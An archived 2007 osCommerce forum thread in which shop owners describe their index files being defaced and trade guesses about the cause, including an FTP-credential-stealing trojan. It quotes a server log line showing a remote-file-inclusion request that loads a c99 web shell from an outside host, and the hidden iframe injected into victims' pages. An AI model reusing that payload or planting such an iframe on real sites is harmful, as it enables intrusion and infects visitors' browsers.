Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Urgent!! HACKER has changed all index files on server


mac ra

Recommended Posts

I did a lot of searching and didn't find deneme.php listed specifically anywhere in vulnerabilities or other articles on the net.

 

Chuck

deneme.php does return results on Google but nothing specific. It would be the result of an exploit but not the exploit itself and osC isn't among the results.

 

http://www.google.com/search?client=safari...-8&oe=UTF-8

 

This one's kind of interesting. You're running Joomla? This one appears to be attempting to mess with the local mailserver ( vdomainaliases ) I'd cross ref the Joomla forums or post this result over there and see what they think.

 

85.101.6.136 - - [24/Apr/2007:15:38:25 -0500] "GET /joomla15/libraries/pcl/pcltar.php?g_pcltar_lib_dir=http%3A%2F%2Fseawizardssoulcrew.com%2Fgb%2Fpublic%2Fc99.txt%3F&act=img&img=back HTTP/1.1"
200 131 "http://www.anotherjoe.com/joomla15/libraries/pcl/pcltar.php?g_pcltar_lib_dir=http%3A%2F%2Fseawizardssoulcrew.com%2Fgb%2Fpublic%2Fc99.txt%3F&act=ls&d=%2Fetc%2Fvdomainaliases&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

 

Iggy

Everything's funny but nothing's a joke...

Link to comment
Share on other sites

  • 2 weeks later...
  • Replies 60
  • Created
  • Last Reply

Our Site Got hacked too

 

Index files were changed and Iframe code was added, just tell me what info you want and ill give you what I can.

 

Charly

Charly

 

My fav site

 

Spend most my cash there dont tell the wife:-)

Link to comment
Share on other sites

We discovered that this is more than likely a PC based virus.

 

There is Trojan out there that gets ftp passwords from various ftp programs including Total Commander.

 

Virus Name: Trojan-PSW.Win32.LdPinch.bok

 

So collect ftp details from all over the place and then just automate this hack which ftps in and download and upload any files that starts "index".

 

 

So check you PC, upgrade your ftp software and change your ftp passwords.

Link to comment
Share on other sites

We discovered that this is more than likely a PC based virus.

 

There is Trojan out there that gets ftp passwords from various ftp programs including Total Commander.

 

Virus Name: Trojan-PSW.Win32.LdPinch.bok

 

So collect ftp details from all over the place and then just automate this hack which ftps in and download and upload any files that starts "index".

So check you PC, upgrade your ftp software and change your ftp passwords.

 

Ok i did sweap all pcs as well after seeing this happen, the trojan was not found.

Charly

 

My fav site

 

Spend most my cash there dont tell the wife:-)

Link to comment
Share on other sites

Could anyone else have your ftp details? Contractor? Freelancer? Hosting company? Because this is not a brute force attack. They have your ftp details. And so they got them somehow.

Link to comment
Share on other sites

  • 2 months later...

I got hacked to. An iframe code has been added to all index and default pages on my server.

My host (one and one) told me, that osC has the ability to be exploited in older version.

As my version is not pretty new, MS2.2, what do I need to update?

Link to comment
Share on other sites

I got hacked to. An iframe code has been added to all index and default pages on my server.

My host (one and one) told me, that osC has the ability to be exploited in older version.

As my version is not pretty new, MS2.2, what do I need to update?

There are four versions of MS2. You need to update to the latest one to have all of the security updates installed.

 

Jack

Support Links:

For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc.

Get the latest versions of my addons

Recommended SEO Addons

Link to comment
Share on other sites

  • 2 weeks later...

I have an osCMax installation that was hacked on 7/25/07, same MO. It put this code in all the login.php, index.php and index.html files:

 

<iframe src='http://alltraff.ru/traff.php' width='1' height='1' style='visibility: hidden;'></iframe>

 

I've been searching for a couple of hours, both on this message board, the osCMax board and Google. Seems to happen to a lot of people, but nobody seems to know how, why or more importantly, WHAT IT DOES.

 

If ANYbody can shed light on how this is happening to so many of us, PLEASE post it here.

Link to comment
Share on other sites

  • 2 weeks later...

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...